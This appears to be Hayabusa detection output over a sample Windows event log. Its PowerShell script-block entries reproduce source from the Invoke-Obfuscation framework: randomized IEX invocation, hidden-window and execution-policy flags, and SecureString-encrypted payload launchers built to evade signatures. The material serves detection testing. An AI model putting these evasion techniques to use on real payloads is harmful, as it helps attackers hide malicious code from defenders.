Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. 
# This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. 
I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. 
$LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' 
,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' 
$ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. 
$NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. 
